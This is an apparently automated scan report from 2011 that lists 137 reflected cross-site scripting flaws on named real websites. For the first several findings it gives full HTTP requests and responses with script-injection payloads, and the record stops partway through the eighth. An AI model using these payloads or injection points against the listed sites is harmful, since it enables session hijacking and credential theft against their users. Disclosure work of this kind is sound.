XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05212011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sat May 21 08:17:05 CDT 2011.


1. Cross-site scripting (reflected)

1.1. http://www.9to5mac.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 1]

1.3. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 2]

1.4. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 3]

1.5. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 4]

1.6. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 1]

1.7. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 2]

1.8. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 3]

1.9. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 4]

1.10. http://www.businesswire.com/news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing [REST URL parameter 3]

1.11. http://www.businesswire.com/news/home/20110518005243/en/Cameron-Health-Completes-107-Million-Equity-Financing [REST URL parameter 4]

1.12. http://www.lincoln.com/crossovers/mkx/experiencemkx/ [bannerid parameter]

1.13. http://www.lincoln.com/crossovers/mkx/experiencemkx/ [referrer parameter]

1.14. http://www.reuters.com/assets/sharedModuleJS [callback parameter]

1.15. http://www.reuters.com/assets/sharedModuleJS [sp parameter]

1.16. http://www.sourcebits.com/ [name of an arbitrarily supplied request parameter]

1.17. http://www.sourcebits.com/android [REST URL parameter 1]

1.18. http://www.sourcebits.com/android [name of an arbitrarily supplied request parameter]

1.19. http://www.sourcebits.com/blackberry [REST URL parameter 1]

1.20. http://www.sourcebits.com/blackberry [name of an arbitrarily supplied request parameter]

1.21. http://www.sourcebits.com/css/404.css [REST URL parameter 1]

1.22. http://www.sourcebits.com/css/404.css [REST URL parameter 1]

1.23. http://www.sourcebits.com/css/404.css [REST URL parameter 2]

1.24. http://www.sourcebits.com/css/404.css [REST URL parameter 2]

1.25. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 1]

1.26. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 1]

1.27. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 2]

1.28. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 2]

1.29. http://www.sourcebits.com/css/components.css [REST URL parameter 1]

1.30. http://www.sourcebits.com/css/components.css [REST URL parameter 1]

1.31. http://www.sourcebits.com/css/components.css [REST URL parameter 2]

1.32. http://www.sourcebits.com/css/components.css [REST URL parameter 2]

1.33. http://www.sourcebits.com/css/home.css [REST URL parameter 1]

1.34. http://www.sourcebits.com/css/home.css [REST URL parameter 1]

1.35. http://www.sourcebits.com/css/home.css [REST URL parameter 2]

1.36. http://www.sourcebits.com/css/home.css [REST URL parameter 2]

1.37. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 1]

1.38. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 1]

1.39. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 2]

1.40. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 2]

1.41. http://www.sourcebits.com/css/main.css [REST URL parameter 1]

1.42. http://www.sourcebits.com/css/main.css [REST URL parameter 1]

1.43. http://www.sourcebits.com/css/main.css [REST URL parameter 2]

1.44. http://www.sourcebits.com/css/main.css [REST URL parameter 2]

1.45. http://www.sourcebits.com/css/project.css [REST URL parameter 1]

1.46. http://www.sourcebits.com/css/project.css [REST URL parameter 1]

1.47. http://www.sourcebits.com/css/project.css [REST URL parameter 2]

1.48. http://www.sourcebits.com/css/project.css [REST URL parameter 2]

1.49. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 1]

1.50. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 1]

1.51. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 2]

1.52. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 2]

1.53. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 1]

1.54. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 1]

1.55. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 2]

1.56. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 2]

1.57. http://www.sourcebits.com/design [REST URL parameter 1]

1.58. http://www.sourcebits.com/design [name of an arbitrarily supplied request parameter]

1.59. http://www.sourcebits.com/facebook [REST URL parameter 1]

1.60. http://www.sourcebits.com/facebook [name of an arbitrarily supplied request parameter]

1.61. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 1]

1.62. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 1]

1.63. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 2]

1.64. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 2]

1.65. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 3]

1.66. http://www.sourcebits.com/images/logo/favicon.png [REST URL parameter 3]

1.67. http://www.sourcebits.com/ipad [REST URL parameter 1]

1.68. http://www.sourcebits.com/ipad [name of an arbitrarily supplied request parameter]

1.69. http://www.sourcebits.com/iphone [REST URL parameter 1]

1.70. http://www.sourcebits.com/iphone [name of an arbitrarily supplied request parameter]

1.71. http://www.sourcebits.com/js/blogger.js [REST URL parameter 1]

1.72. http://www.sourcebits.com/js/blogger.js [REST URL parameter 1]

1.73. http://www.sourcebits.com/js/blogger.js [REST URL parameter 2]

1.74. http://www.sourcebits.com/js/blogger.js [REST URL parameter 2]

1.75. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 1]

1.76. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 1]

1.77. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 2]

1.78. http://www.sourcebits.com/js/css-browser-selector.js [REST URL parameter 2]

1.79. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 1]

1.80. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 1]

1.81. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 2]

1.82. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 2]

1.83. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 1]

1.84. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 1]

1.85. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 2]

1.86. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 2]

1.87. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 1]

1.88. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 1]

1.89. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 2]

1.90. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 2]

1.91. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 1]

1.92. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 1]

1.93. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 2]

1.94. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 2]

1.95. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 1]

1.96. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 1]

1.97. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 2]

1.98. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 2]

1.99. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 1]

1.100. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 1]

1.101. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 2]

1.102. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 2]

1.103. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 1]

1.104. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 1]

1.105. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 2]

1.106. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 2]

1.107. http://www.sourcebits.com/js/main.js [REST URL parameter 1]

1.108. http://www.sourcebits.com/js/main.js [REST URL parameter 1]

1.109. http://www.sourcebits.com/js/main.js [REST URL parameter 2]

1.110. http://www.sourcebits.com/js/main.js [REST URL parameter 2]

1.111. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 1]

1.112. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 1]

1.113. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 2]

1.114. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 2]

1.115. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 1]

1.116. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 1]

1.117. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 2]

1.118. http://www.sourcebits.com/js/sb_announce.js [REST URL parameter 2]

1.119. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 1]

1.120. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 1]

1.121. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 2]

1.122. http://www.sourcebits.com/js/ttSelectbox-services.js [REST URL parameter 2]

1.123. http://www.sourcebits.com/mac [REST URL parameter 1]

1.124. http://www.sourcebits.com/mac [name of an arbitrarily supplied request parameter]

1.125. http://www.sourcebits.com/mobile [REST URL parameter 1]

1.126. http://www.sourcebits.com/mobile [name of an arbitrarily supplied request parameter]

1.127. http://www.sourcebits.com/palmpre [REST URL parameter 1]

1.128. http://www.sourcebits.com/palmpre [name of an arbitrarily supplied request parameter]

1.129. http://www.sourcebits.com/sourcebits.json [REST URL parameter 1]

1.130. http://www.sourcebits.com/web [REST URL parameter 1]

1.131. http://www.sourcebits.com/web [name of an arbitrarily supplied request parameter]

1.132. http://www.constantcontact.com/index.jsp [Referer HTTP header]

1.133. http://www.constantcontact.com/index.jsp [Referer HTTP header]

1.134. https://www.constantcontact.com/evm_fee_schedule.jsp [Referer HTTP header]

1.135. https://www.constantcontact.com/offer/buynow/yourweek/signup.jsp [Referer HTTP header]

1.136. http://www.zdnet.com/blog/btl [Referer HTTP header]

1.137. http://www.nytimes.com/recommendations/svc/personalized.json [RMID cookie]



1. Cross-site scripting (reflected)
There are 137 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.9to5mac.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.9to5mac.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48b3f"><script>alert(1)</script>3e058265935 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48b3f\"><script>alert(1)</script>3e058265935 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?48b3f"><script>alert(1)</script>3e058265935=1 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:34:33 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: PHPSESSID=cf18spmc167geqejfopom63db6; path=/
Set-Cookie: X-Mapping-nollkmcj=5FD4FB526FDDB0926B78A11572F4BBB7; path=/
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 69885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/?48b3f\"><script>alert(1)</script>3e058265935=1" />
...[SNIP]...

1.2. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.9to5mac.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57180"><script>alert(1)</script>07531661609 was submitted in the REST URL parameter 1. This input was echoed as 57180\"><script>alert(1)</script>07531661609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content57180"><script>alert(1)</script>07531661609/plugins/sociable/sociable.css?ver=3.1.2 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:20 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:21 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content57180\"><script>alert(1)</script>07531661609/plugins/sociable/sociable.css?ver=3.1.2" />
...[SNIP]...

1.3. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.9to5mac.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0583"><script>alert(1)</script>da53712e5a1 was submitted in the REST URL parameter 2. This input was echoed as f0583\"><script>alert(1)</script>da53712e5a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf0583"><script>alert(1)</script>da53712e5a1/sociable/sociable.css?ver=3.1.2 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:22 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:22 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/pluginsf0583\"><script>alert(1)</script>da53712e5a1/sociable/sociable.css?ver=3.1.2" />
...[SNIP]...

1.4. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.9to5mac.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a39"><script>alert(1)</script>dcd3306fa13 was submitted in the REST URL parameter 3. This input was echoed as 21a39\"><script>alert(1)</script>dcd3306fa13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable21a39"><script>alert(1)</script>dcd3306fa13/sociable.css?ver=3.1.2 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:24 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:24 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins/sociable21a39\"><script>alert(1)</script>dcd3306fa13/sociable.css?ver=3.1.2" />
...[SNIP]...

1.5. http://www.9to5mac.com/wp-content/plugins/sociable/sociable.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.9to5mac.com
Path:   /wp-content/plugins/sociable/sociable.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd1a2"><script>alert(1)</script>5c0b8d9b4bf was submitted in the REST URL parameter 4. This input was echoed as cd1a2\"><script>alert(1)</script>5c0b8d9b4bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sociable/sociable.csscd1a2"><script>alert(1)</script>5c0b8d9b4bf?ver=3.1.2 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:25 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:25 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins/sociable/sociable.csscd1a2\"><script>alert(1)</script>5c0b8d9b4bf?ver=3.1.2" />
...[SNIP]...

1.6. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.9to5mac.com
Path:   /wp-content/plugins/wp-paginate/wp-paginate.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cbf1"><script>alert(1)</script>b566cce6b2 was submitted in the REST URL parameter 1. This input was echoed as 5cbf1\"><script>alert(1)</script>b566cce6b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content5cbf1"><script>alert(1)</script>b566cce6b2/plugins/wp-paginate/wp-paginate.css?ver=1.2.3 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:20 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:20 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content5cbf1\"><script>alert(1)</script>b566cce6b2/plugins/wp-paginate/wp-paginate.css?ver=1.2.3" />
...[SNIP]...

1.7. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.9to5mac.com
Path:   /wp-content/plugins/wp-paginate/wp-paginate.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a29"><script>alert(1)</script>543e9a4a757 was submitted in the REST URL parameter 2. This input was echoed as 56a29\"><script>alert(1)</script>543e9a4a757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins56a29"><script>alert(1)</script>543e9a4a757/wp-paginate/wp-paginate.css?ver=1.2.3 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:22 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.9to5mac.com%2F; path=/
Last-Modified: Sat, 21 May 2011 12:35:22 GMT
X-Powered-By: W3 Total Cache/0.9.1.4b
Content-Length: 21257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect" value="/wp-content/plugins56a29\"><script>alert(1)</script>543e9a4a757/wp-paginate/wp-paginate.css?ver=1.2.3" />
...[SNIP]...

1.8. http://www.9to5mac.com/wp-content/plugins/wp-paginate/wp-paginate.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.9to5mac.com
Path:   /wp-content/plugins/wp-paginate/wp-paginate.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c35c"><script>alert(1)</script>f982dad186 was submitted in the REST URL parameter 3. This input was echoed as 7c35c\"><script>alert(1)</script>f982dad186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-paginate7c35c"><script>alert(1)</script>f982dad186/wp-paginate.css?ver=1.2.3 HTTP/1.1
Host: www.9to5mac.com
Proxy-Connection: keep-alive
Referer: http://www.9to5mac.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o6oeag3kuo11c7juoqi3vl25a1; X-Mapping-nollkmcj=016C4D6960FBAF518AB7E36562C920CF

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 21 May 2011 12:35:23 GMT
X-Pingback: http://www.9to5mac.com/xmlrpc.php
